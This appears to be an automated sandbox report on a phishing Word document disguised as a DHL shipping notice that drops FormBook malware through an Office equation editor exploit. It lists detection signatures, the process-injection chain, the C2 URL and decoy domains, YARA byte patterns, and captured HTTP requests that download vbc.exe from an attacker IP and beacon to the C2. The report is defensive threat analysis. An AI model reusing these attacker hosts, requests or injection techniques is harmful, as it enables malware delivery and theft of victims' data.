Loading ...

Play interactive tourEdit tour

Analysis Report DHL Shipping doc & Shipment tracking details.docx

Overview

General Information

Sample Name:DHL Shipping doc & Shipment tracking details.docx
Analysis ID:383965
MD5:30909a9932c77fb923a96b1b090b4806
SHA1:2bbe988290a47de63763796db6a39de0e268a5cf
SHA256:23e650ad3f02ea9f4a402bf5e719d745b7c307c34fd8915045c79d51aab48741
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2244 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2452 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
      • vbc.exe (PID: 2828 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 852 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2192 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9b88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9f22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15c35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15721:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15d37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15eaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa93a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1499c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb6b2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad27:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bdca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.1.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.1.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.1.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        11.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.scott-re.online/nnmd/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeReversingLabs: Detection: 41%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 11.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: vbc.exe, 0000000B.00000002.2145782499.00000000003E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
          Source: global trafficDNS query: name: www.nevomo.group
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.95.122.24:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49168 -> 23.95.122.24:80
          Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49169 -> 23.95.122.24:80
          Source: TrafficSnort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49170 -> 23.95.122.24:80
          Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49172 -> 23.95.122.24:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.scott-re.online/nnmd/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 11:18:03 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 04:59:44 GMTETag: "5e800-5bf6eea6ef000"Accept-Ranges: bytesContent-Length: 387072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1Host: www.nevomo.groupConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 23.95.122.24Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: unknownTCP traffic detected without corresponding DNS query: 23.95.122.24
          Source: C:\Windows\explorer.exeCode function: 13_2_0293C302 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24814E40-30CA-4646-ACFF-79FC9E14ADCB}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 23.95.122.24Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /zyo/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.122.24Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1Host: www.nevomo.groupConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.nevomo.group
          Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
